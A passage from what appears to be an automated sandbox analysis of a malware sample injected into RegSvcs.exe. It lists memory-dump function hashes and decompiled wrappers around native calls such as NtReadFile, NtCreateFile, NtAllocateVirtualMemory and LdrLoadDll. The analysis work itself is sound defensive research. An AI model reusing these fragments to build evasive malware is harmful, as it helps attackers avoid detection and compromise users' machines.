Instruction Fuzzy Hash: 34711474E15209DFCB04CFA9D4849AEFBF1FF89310F14956AE859AB224D730AA41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 07D51B90, Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4546354393e38323951d2b423acb627144b76476b3cf3e44b60ff81553c6284
Instruction ID: c623bfe9563a5eb60c5562c04d15f5bd8fc2946588edab6aa128124148b13fa0
Opcode Fuzzy Hash: a4546354393e38323951d2b423acb627144b76476b3cf3e44b60ff81553c6284
Instruction Fuzzy Hash: 5061F4B4E1921D8BCF04CFA9C5805EEFBF2FB8A210F24A52AD855B7314D3359A418F65

Uniqueness

Uniqueness Score: -1.00%

Function 07D51B80, Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f771a6b66f74534c662dbded65b93908440085b0c6bd49eeadde0f0865ca48c2
Instruction ID: 277a59ba8bc761b609246194878a63cd2a90ba19c5d316e819b35021305a6392
Opcode Fuzzy Hash: f771a6b66f74534c662dbded65b93908440085b0c6bd49eeadde0f0865ca48c2
Instruction Fuzzy Hash: FE6106B4E192098BCF04CFA9C5805EEFBF2FF8A210F24956AD455B7214D3359A41CB65

Uniqueness

Uniqueness Score: -1.00%

Function 07D52AE9, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d665dbc174f48527f4f4ffdbc752cc1c455bb48643799dbd7da760129f7a159
Instruction ID: ce4df2fc5cd15326ae7e27204a408151681f04c9e9abf29935f43db823a46f18
Opcode Fuzzy Hash: 0d665dbc174f48527f4f4ffdbc752cc1c455bb48643799dbd7da760129f7a159
Instruction Fuzzy Hash: B351EDF6E01A598BDB58CF6798452CAFBF3BFD9310F04C1BAC408AA615DB3506868F51

Uniqueness

Uniqueness Score: -1.00%

Function 07D52B68, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6fb198eab5994583519e13f1157341eab59f6d0230621f447c7f1348c4e747a
Instruction ID: 7c29eeea1f9b1a283710733f468b21500a3a796fd58047288fba0d3889f11ba8
Opcode Fuzzy Hash: a6fb198eab5994583519e13f1157341eab59f6d0230621f447c7f1348c4e747a
Instruction Fuzzy Hash: EF414FB1E056188BDB28CF6B8D4579EFBF3BFC9300F14C1BA850CA6254DB341A868E51

Uniqueness

Uniqueness Score: -1.00%

Function 07D56478, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad99596602e12da9576368e929d5ba400b4cbd51d22e50a3b73fd56d8a508c83
Instruction ID: 9901acbadb3c2377b0d15d3c690137acdc3a3e81473fbb304a8ab60332f832b5
Opcode Fuzzy Hash: ad99596602e12da9576368e929d5ba400b4cbd51d22e50a3b73fd56d8a508c83
Instruction Fuzzy Hash: 65112C71E116199BDB08CFAAD9406DEFBF7ABC8310F14C13AD508A7214EB305A418F91

Uniqueness

Uniqueness Score: -1.00%

Function 07D56468, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c93872e408628b10ea6d8052c32155e6ecdb496e039fb5bac76b7961ac0265e
Instruction ID: 05d18eaa31050aabb99ce8a55abfa694e57f53988481b9b9f8eda08cac70ec6f
Opcode Fuzzy Hash: 7c93872e408628b10ea6d8052c32155e6ecdb496e039fb5bac76b7961ac0265e
Instruction Fuzzy Hash: 96212CB0E156598BEB48CF6AC94069EFFF3AFC9200F18C16AD508E7254DB744A06CF51

Uniqueness

Uniqueness Score: -1.00%

Function 07D51FD8, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.272409804.0000000007D50000.00000040.00000001.sdmp, Offset: 07D50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ca0aae64f9452c5b5a1d2652d2f9a923bfb56d72d2778d0dd576e225fc21811
Instruction ID: a7e4d090d68f3a4398488b3831eeb7a34e2726246e787a76d23764051f3e7985
Opcode Fuzzy Hash: 2ca0aae64f9452c5b5a1d2652d2f9a923bfb56d72d2778d0dd576e225fc21811
Instruction Fuzzy Hash: 6F21D8B1E056598BEB08CF6BC84169EFBF3AFC8200F08C07AD808A6264EB3405468F51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exe PID: 6228 Parent PID: 3092 RegSvcs.exeCOMMON

Executed Functions

Function 00419E0A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419E0A(void* __eax, void* __ebx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _v1957338735;
				void* _t22;
				void* _t33;
				intOrPtr* _t34;
				void* _t36;

				_t17 = _a4;
				_t34 = _a4 + 0xc48;
				E0041A960(_t17, _t34,  *((intOrPtr*)(_t17 + 0x10)), 0, 0x2a);
				_t9 =  &_a32; // 0x414d42
				_t15 =  &_a8; // 0x414d42
				_t22 =  *((intOrPtr*)( *_t34))( *_t15, _a12, _a16, _a20, _a24, _a28,  *_t9, _a36, _a40, _t33, _t36); // executed
				return _t22;
			}

0x00419e13
0x00419e1f
0x00419e27
0x00419e32
0x00419e4d
0x00419e55
0x00419e59

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E32, 00419E40
BMA, xrefs: 00419E4D, 00419E54

Memory Dump Source

Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: 6b3a0c8dc9ab9cc7d9ea52a12992021e72671f4986057322a6cdfce43ab852dd
Instruction ID: be655bd4b0e6fc00cec352cc163d346b193ca555b7e6f757c129bf17b5306bff
Opcode Fuzzy Hash: 6b3a0c8dc9ab9cc7d9ea52a12992021e72671f4986057322a6cdfce43ab852dd
Instruction Fuzzy Hash: 7AF0F4B2200108AFCB14CF99DC80EEB77ADEF8C354F168648FA0DA7241D630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t13 = _a4;
				_t27 = _a4 + 0xc48;
				E0041A960(_t13, _t27,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t27))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419e13
0x00419e1f
0x00419e27
0x00419e32
0x00419e4d
0x00419e55
0x00419e59

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E32, 00419E40
BMA, xrefs: 00419E4D, 00419E54

Memory Dump Source

Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acec
0x0040acef
0x0040acf4
0x0040acf9
0x0040ad03
0x0040ad08
0x0040ad0b
0x0040ad0d
0x0040ad15
0x0040ad1a
0x0040ad1a
0x0040ad21
0x0040ad29
0x0040ad2c
0x0040ad2e
0x0040ad42
0x00000000
0x0040ad44
0x0040ad4a
0x0040acfe
0x0040acfe
0x0040acfe

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96

Uniqueness

Uniqueness Score: -1.00%

Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419d6f
0x00419d77
0x00419dad
0x00419db1

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D5A, Relevance: 1.5, APIs: 1, Instructions: 39
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00419D5A(void* __ecx, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				intOrPtr _v0;
				long _t24;

				_push(ss);
				_t18 = _v0;
				_t6 = _t18 + 0xc40; // 0xc40
				E0041A960(_v0, _t6,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
				_t24 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
				return _t24;
			}

0x00419d5a
0x00419d63
0x00419d6f
0x00419d77
0x00419dad
0x00419db1

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6a0c39184f7e5fd1fc2845491a7248b2d38221021d85c167b55cd5b0030cf1ab
Instruction ID: a054a498a2bccc3ead52e42c922fd4237275239113e9f204a50acda0bc429d50
Opcode Fuzzy Hash: 6a0c39184f7e5fd1fc2845491a7248b2d38221021d85c167b55cd5b0030cf1ab
Instruction Fuzzy Hash: 7FF0B2B2211108AFDB08CF88DC95EEB77BDAF8C754F15865DBA0DA7251C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F3A, Relevance: 1.5, APIs: 1, Instructions: 33
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00419F3A(void* __eax, void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;

				asm("fisubr word [edi]");
				asm("adc edx, [ebp-0x75]");
				_t11 = _a4;
				_t3 = _t11 + 0xc60; // 0xca0
				E0041A960(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}

0x00419f3b
0x00419f3f
0x00419f43
0x00419f4f
0x00419f57
0x00419f79
0x00419f7d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 44186a94b7b44cc78959bb0b1b738d4e941b018e41f81d8c4be29ae8b6588199
Instruction ID: cdea02d43095d62648b7b3e248ff3d7b2981ffa0efe7d8dc4f0a016c044e4a78
Opcode Fuzzy Hash: 44186a94b7b44cc78959bb0b1b738d4e941b018e41f81d8c4be29ae8b6588199
Instruction Fuzzy Hash: 67F058B2200108AFDB14DF99CC81EEB77AAFF88750F158208FA4DA7241C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x00419f4f
0x00419f57
0x00419f79
0x00419f7d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00419E90(void* __esi, intOrPtr _a4, void* _a8) {
				long _t8;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8);
				asm("rcr byte [esi+0x5d], 1");
				return _t8;
			}

0x00419e93
0x00419e96
0x00419e9f
0x00419ea7
0x00419eb5
0x00419eb6
0x00419eb9

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00F598F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F598FA

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dd47d7c6ff9d2967746e5dbd451d40e03d01ea8ebd275c0750facd0dfd7e8d3f
Instruction ID: 9c977de8e498fddf620cab440f10a8c14ce3dbc7f66f137b128d0b4a7d9e86fe
Opcode Fuzzy Hash: dd47d7c6ff9d2967746e5dbd451d40e03d01ea8ebd275c0750facd0dfd7e8d3f
Instruction Fuzzy Hash: FD900261B0100902D201715A4404616100A97D0381F91C032A1015555FCE658992F171

Uniqueness

Uniqueness Score: -1.00%

Function 00F59860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F5986A

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bac412cc1dfe713b9de87026e7e6a89df14211377423f6cc97373e64437bba18
Instruction ID: 9acea7047c9ce534738556313e3de75183f71b05966573b9287cc56cbd04eb0b
Opcode Fuzzy Hash: bac412cc1dfe713b9de87026e7e6a89df14211377423f6cc97373e64437bba18
Instruction Fuzzy Hash: 2C90027170100813D211615A4504707100997D0381F91C422A0415558EDA968952F161

Uniqueness

Uniqueness Score: -1.00%

Function 00F59840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F5984A

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: afd11a986fd75c76d5f2d470c17d4eb29bae97ee1fb367dd95169c25b93e4d55
Instruction ID: b3140bf9d755b01c7184775adb463ac860d5039c652b6b3739495c669a65c018
Opcode Fuzzy Hash: afd11a986fd75c76d5f2d470c17d4eb29bae97ee1fb367dd95169c25b93e4d55
Instruction Fuzzy Hash: 0D900261742045529645B15A44045075006A7E0381791C022A1405950DC9669856F661

Uniqueness

Uniqueness Score: -1.00%

Function 00F595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F595DA

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0dcfe0ebd91c8ee1dc12afdb7abf5c4e429660d19212ce4a94d03e85e3dfd99b
Instruction ID: 69058d5e6e63e0ae3b03ccc44cf1429085394c903245383be6a5cc4205c68f66
Opcode Fuzzy Hash: 0dcfe0ebd91c8ee1dc12afdb7abf5c4e429660d19212ce4a94d03e85e3dfd99b
Instruction Fuzzy Hash: 8D9002A1702004038205715A4414616500A97E0341B51C031E1005590EC9658891B165

Uniqueness

Uniqueness Score: -1.00%

Function 00F599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F599AA

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3b5dadc4a9406aa96a9bc3ab5a8fa43e16982621262e9db7e601447abd804d1a
Instruction ID: d2ebbb9f7d992a8a6d6ebca30b791b51954625e087c4805e5c6387704afe9670
Opcode Fuzzy Hash: 3b5dadc4a9406aa96a9bc3ab5a8fa43e16982621262e9db7e601447abd804d1a
Instruction Fuzzy Hash: B99002A174100842D200615A4414B061005D7E1341F51C025E1055554ECA59CC52B166

Uniqueness

Uniqueness Score: -1.00%

Function 00F59540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F5954A

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1e2b5b332bf1258a1298d0c35329e6e3510c06b412279769b08ccc75d647cef8
Instruction ID: 4b62ffd29c6225820d73440e3a015218c83c1011b8c38f970a82e0b3cd82e1f4
Opcode Fuzzy Hash: 1e2b5b332bf1258a1298d0c35329e6e3510c06b412279769b08ccc75d647cef8
Instruction Fuzzy Hash: 61900265711004034205A55A0704507104697D5391351C031F1006550DDA618861B161

Uniqueness

Uniqueness Score: -1.00%

Function 00F59910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F5991A

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ec7c149e61107a3496ffd884b669a85d508fcb993016f245105f29f54d05b7d4
Instruction ID: b7667a0f31afc59a84206bc139d811d5b9992506d5bc7413a236c7836deed88e
Opcode Fuzzy Hash: ec7c149e61107a3496ffd884b669a85d508fcb993016f245105f29f54d05b7d4
Instruction Fuzzy Hash: A49002B170100802D240715A4404746100597D0341F51C021A5055554FCA998DD5B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00F596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F596EA

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 640603656618f03567329130a61111bd16e2247b6296fb543ddbeecd273d7c2b
Instruction ID: f785a899da0dfd0d7d06cb0fd14676072549c8e3f42a93ca2592413ccf5b622b
Opcode Fuzzy Hash: 640603656618f03567329130a61111bd16e2247b6296fb543ddbeecd273d7c2b
Instruction Fuzzy Hash: 3990027170108C02D210615A840474A100597D0341F55C421A4415658ECAD58891B161

Uniqueness

Uniqueness Score: -1.00%

Function 00F59660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F5966A

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ec1e25016675323297d7366fdef22abaaa63167c7271e7dc850ae1c7be19574
Instruction ID: 47df8a1eee954c183b5fc413518c09b73ee94209ec7fb908501affe82e7ca2de
Opcode Fuzzy Hash: 2ec1e25016675323297d7366fdef22abaaa63167c7271e7dc850ae1c7be19574
Instruction Fuzzy Hash: 4B90027170100C02D280715A440464A100597D1341F91C025A0016654ECE558A59B7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00F59A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F59A5A

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f9c51aca9d722eb434e0b98e87d4fdd0f49f3cbce497cd88ed2ebba9e131c2e5
Instruction ID: 71747927172317c530f959060f74489a338b672a147d66fdbe459349008bd736
Opcode Fuzzy Hash: f9c51aca9d722eb434e0b98e87d4fdd0f49f3cbce497cd88ed2ebba9e131c2e5
Instruction Fuzzy Hash: 3F90026171180442D300656A4C14B07100597D0343F51C125A0145554DCD558861B561

Uniqueness

Uniqueness Score: -1.00%

Function 00F59A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F59A2A

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f8b6829a34d0d24e53c7338691213a7612cec61382ba46894ab394736f9cfc8
Instruction ID: a5b7fdfbf5fe604543a6035d0846ead01ef6ebb354cddd2546d43bce3afd04e9
Opcode Fuzzy Hash: 6f8b6829a34d0d24e53c7338691213a7612cec61382ba46894ab394736f9cfc8
Instruction Fuzzy Hash: 50900261B01004428240716A88449065005BBE1351751C131A0989550EC9998865B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00F59A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F59A0A

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 75fa17a14488ca16ddcce2173ddb7a6671609e2dddc6cbed5d49b08f8326cf4f
Instruction ID: ec0fc32fd1758fcfc06d114b7a01a9978fd27d36b9ed3de1b09a3d94747e602b
Opcode Fuzzy Hash: 75fa17a14488ca16ddcce2173ddb7a6671609e2dddc6cbed5d49b08f8326cf4f
Instruction Fuzzy Hash: 8C90027170140802D200615A481470B100597D0342F51C021A1155555ECA658851B5B1

Uniqueness

Uniqueness Score: -1.00%

Function 00F597A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F597AA

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6cedfc1307578da3b9919c04cc85eded077195f47547435950739ae0eab00c03
Instruction ID: 84325468cd8d61f69f06fd40c0e515d5296b6df9a57ccb872a40655d4eb8463c
Opcode Fuzzy Hash: 6cedfc1307578da3b9919c04cc85eded077195f47547435950739ae0eab00c03
Instruction Fuzzy Hash: C990026170100403D240715A54186065005E7E1341F51D021E0405554DDD558856B262

Uniqueness

Uniqueness Score: -1.00%

Function 00F59780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F5978A

